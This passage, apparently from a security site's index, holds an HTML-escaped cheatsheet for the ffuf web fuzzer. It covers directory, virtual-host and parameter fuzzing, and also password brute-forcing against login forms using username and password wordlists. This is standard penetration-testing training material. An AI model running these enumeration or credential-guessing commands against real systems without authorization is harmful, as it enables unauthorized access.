\\ -o ffuf_vhost.json -of json ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/ffuf/","summary":"\u003ch1 id=\"ffuf-cheatsheet\"\u003effuf Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Fast web fuzzer — directory busting, virtual host discovery, parameter fuzzing, Host header fuzzing\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install ffuf\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/ffuf/ffuf/v2@latest\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"core-concept\"\u003eCore Concept\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003eFUZZ\u003c/code\u003e is the keyword replaced by each wordlist entry. 
It can go anywhere in the request — URL path, headers, parameters, body.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eMultiple keywords are supported by naming them with \u003ccode\u003e-w wordlist:KEYWORD\u003c/code\u003e:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist1.txt -w params.txt:PARAM\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL (include FUZZ)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist (use \u003ccode\u003ewordlist:KEYWORD\u003c/code\u003e for named)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H 
\u0026lt;header\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd/fuzz header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-X \u0026lt;method\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP method (default: GET)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d \u0026lt;data\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePOST data body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;cookie\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCookie string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkip TLS verification\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default: 40)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;delay\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDelay between requests (e.g. 
\u003ccode\u003e0.1\u003c/code\u003e, \u003ccode\u003e0.5-1.5\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-rate \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax requests per second\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-timeout \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRequest timeout in seconds\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-mc \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch status codes (default: 200-299,301,302,307,401,403,405,500)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ms \u0026lt;size\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch response size\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-mw \u0026lt;words\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch word count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ml \u0026lt;lines\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch line count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-mr \u0026lt;regex\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMatch regex in response body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fc \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fs \u0026lt;size\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter response 
size\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fw \u0026lt;words\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter word count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fl \u0026lt;lines\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter line count\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-fr \u0026lt;regex\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter regex in response body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ac\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAuto-calibrate filters (detects and removes false positives)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-of \u0026lt;fmt\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput format: \u003ccode\u003ejson\u003c/code\u003e, \u003ccode\u003eejson\u003c/code\u003e, \u003ccode\u003ehtml\u003c/code\u003e, \u003ccode\u003emd\u003c/code\u003e, \u003ccode\u003ecsv\u003c/code\u003e, \u003ccode\u003eall\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose (show redirects, full URL)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSilent — only 
results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-c\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eColorize output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-recursion\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEnable recursive fuzzing\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-recursion-depth \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRecursion depth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-e \u0026lt;exts\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile extensions (e.g. \u003ccode\u003ephp,html,txt\u003c/code\u003e)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ic\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIgnore wordlist comments\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-input-cmd \u0026lt;cmd\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse command output as input instead of wordlist\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"directory--file-fuzzing\"\u003eDirectory \u0026amp; File Fuzzing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic directory scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w 
wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# With file extensions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -e .php,.html,.txt,.bak\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter 404s\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fc \u003cspan style=\"color:#ae81ff\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Match only 200\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -mc \u003cspan style=\"color:#ae81ff\"\u003e200\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Auto-calibrate (removes false positives automatically)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -ac\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Recursive scanning\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -recursion -recursion-depth \u003cspan style=\"color:#ae81ff\"\u003e3\u003c/span\u003e -e .php\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter by response size (remove noise)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fs \u003cspan style=\"color:#ae81ff\"\u003e4242\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"virtual-host-discovery-host-header-fuzzing\"\u003eVirtual Host Discovery (Host Header Fuzzing)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic vhost fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter default response 
size\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -fs \u0026lt;default_size\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Auto-calibrate to remove default response\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -ac\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u https://\u0026lt;ip\u0026gt; -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: FUZZ.example.com\u0026#34;\u003c/span\u003e \u003cspan 
style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -k -fs \u0026lt;default_size\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"parameter-fuzzing\"\u003eParameter Fuzzing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# GET parameter discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/page?FUZZ=value\u0026#34;\u003c/span\u003e -w wordlist.txt -fc \u003cspan style=\"color:#ae81ff\"\u003e404\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# GET parameter value fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;http://\u0026lt;ip\u0026gt;/page?id=FUZZ\u0026#34;\u003c/span\u003e -w numbers.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POST parameter 
fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/login \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -X POST \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -fc \u003cspan style=\"color:#ae81ff\"\u003e401\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POST body with JSON\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/api/login \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -X POST \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Content-Type: application/json\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -d \u003cspan 
style=\"color:#e6db74\"\u003e\u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;FUZZ\u0026#34;}\u0026#39;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"multiple-wordlists-clusterbomb--pitchfork\"\u003eMultiple Wordlists (Clusterbomb / Pitchfork)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Two keywords — try all combinations (clusterbomb)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ/W2 \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w wordlist.txt:FUZZ \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w extensions.txt:W2\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Username + password combinations\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/login \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e  -X POST \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -d \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;user=USER\u0026amp;pass=PASS\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w users.txt:USER \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -w passwords.txt:PASS \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -fc \u003cspan style=\"color:#ae81ff\"\u003e401\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"fuzzing-with-proxy-burp-suite\"\u003eFuzzing with Proxy (Burp Suite)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003effuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -x http://127.0.0.1:8080 -k\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"output\"\u003eOutput\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" 
